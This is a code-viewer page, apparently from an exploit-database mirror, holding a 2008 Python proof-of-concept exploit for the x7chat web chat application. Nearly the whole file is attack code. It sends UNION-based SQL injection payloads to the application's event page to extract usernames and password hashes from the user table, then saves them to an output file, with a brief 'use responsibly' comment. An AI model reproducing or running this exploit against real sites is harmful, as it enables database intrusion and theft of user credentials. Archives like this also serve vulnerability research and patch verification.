PageRenderTime 24ms CodeModel.GetById 15ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/4907.py

https://bitbucket.org/DinoRex99/exploit-database
Python | 58 lines | 47 code | 1 blank | 10 comment | 3 complexity | fc470e2db560ac472c51fe00407b71ff MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. #!/usr/bin/python

    2. 

  2. #

    3. 

  3. #Exploit for xchat 2.0.5

    4. 

  4. #Saca los usuarios y los hash

    5. 

  5. #By nonroot - 2008

    6. 

  6. #it's a PoC, please use responsibly

    7. 

  7. #

    8. 

  8. import string,urllib

    9. 

  9. import sys,re

    10. 

  10. print "Target host: i.e: http://127.0.0.1/x7chat/"

    11. 

  11. host=raw_input("Target host ( include http and /): ")

    12. 

  12. print "Output file: i.e: salida.txt"

    13. 

  13. out_file=raw_input("Output file: ")

    14. 

  14. print "trying ..."

    15. 

  15. SQL_users="1%20UNION%20select%20username,id,username%20from%20x7chat2_users%20--"

    16. 

  16. SQL_hashs="1%20UNION%20select%20username,id,password%20from%20x7chat2_users%20--"

    17. 

  17. link_attack=host+"index.php?act=sm_window&page=event&day="

    18. 

  18. response = urllib.urlopen(link_attack + SQL_users).read()

    19. 

  19. findall_users=re.compile("</b>(\w+)<Br><Br>").findall

    20. 

  20. found_users=findall_users(response)

    21. 

  21. if len(found_users)==0:

    22. 

  22. 	print "Sorry, exploit failed, please review the SQL string and try to change something like tables or wathever"

    23. 

  23. 	print "Or, there are not users, or x7chat software is version >= 2.0.5.1, so sorry. try to find a new bug ;)"

    24. 

  24. 	sys.exit()

    25. 

  25. #Find the hashs

    26. 

  26. response = urllib.urlopen(link_attack + SQL_hashs).read()

    27. 

  27. findall_hashs=re.compile("</b>(\w+)<Br><Br>").findall

    28. 

  28. found_hashs=findall_hashs(response)

    29. 

  29. if len(found_hashs)==0:

    30. 

  30. 	print "Sorry, exploit failed, please review the SQL string and try to change something like tables or wathever"

    31. 

  31. 	print "Or, there are not hashs, or x7chat software is version >= 2.0.5.1, so sorry. try to find a new bug ;)"

    32. 

  32. 	sys.exit()

    33. 

  33. #Save all this at file

    34. 

  34. file = open(out_file, "w")

    35. 

  35. file.write("*********************************************************************\n")

    36. 

  36. file.write("\n")

    37. 

  37. file.write("HOST:")

    38. 

  38. file.write("	")

    39. 

  39. file.write(host)

    40. 

  40. file.write("\n")

    41. 

  41. file.write("\n")

    42. 

  42. file.write("USER						HASH\n")

    43. 

  43. file.write("possible admin user: ")

    44. 

  44. file.write(found_users[0])

    45. 

  45. file.write("			")

    46. 

  46. file.write(found_hashs[0])

    47. 

  47. file.write("\n")

    48. 

  48. for i in range(len(found_users)):

    49. 

  49. 	file.write(found_users[i])

    50. 

  50. 	file.write("		 				")

    51. 

  51. 	file.write(found_hashs[i])

    52. 

  52. 	file.write("\n")

    53. 

  53. file.write("\n")

    54. 

  54. file.write("*********************************************************************\n")

    55. 

  55. file.close()

    56. 

  56. print "Successfull, please review the ",out_file," file."

    57. 

  57. 

    58. 

  58. # milw0rm.com [2008-01-14]
    59.